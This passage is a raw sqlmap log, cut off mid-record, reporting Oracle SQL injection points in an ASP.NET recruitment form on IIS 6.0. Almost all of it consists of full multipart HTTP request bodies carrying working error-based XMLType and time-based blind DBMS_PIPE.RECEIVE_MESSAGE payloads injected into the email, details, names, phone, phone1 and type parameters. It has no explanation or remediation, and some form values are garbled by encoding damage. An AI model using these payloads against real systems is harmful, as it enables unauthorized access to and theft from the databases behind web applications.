Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART email ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]'||(SELECT 'UzxQ' FROM DUAL WHERE 2668=2668 AND 5905=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5905=5905) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]'||(SELECT 'RVVS' FROM DUAL WHERE 8308=8308 AND 5543=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(116)||CHR(83)||CHR(70),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART details ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'uqLE' FROM DUAL WHERE 4248=4248 AND 2975=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2975=2975) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'oAQB' FROM DUAL WHERE 9489=9489 AND 5017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(72)||CHR(79)||CHR(108),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: type (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: type=3'||(SELECT 'pVJN' FROM DUAL WHERE 5132=5132 AND 8870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8870=8870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: type=3'||(SELECT 'MWEP' FROM DUAL WHERE 8072=8072 AND 6755=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(77)||CHR(80)||CHR(121),5))||'
Parameter: MULTIPART names ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'vYVe' FROM DUAL WHERE 1452=1452 AND 9762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9762=9762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'ekop' FROM DUAL WHERE 6976=6976 AND 4438=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(76)||CHR(68)||CHR(119),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone1 ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'dmzn' FROM DUAL WHERE 8179=8179 AND 3342=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3342=3342) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'kbgB' FROM DUAL WHERE 8921=8921 AND 9828=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(113)||CHR(113)||CHR(84),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'NHOb' FROM DUAL WHERE 2799=2799 AND 5308=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5308=5308) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
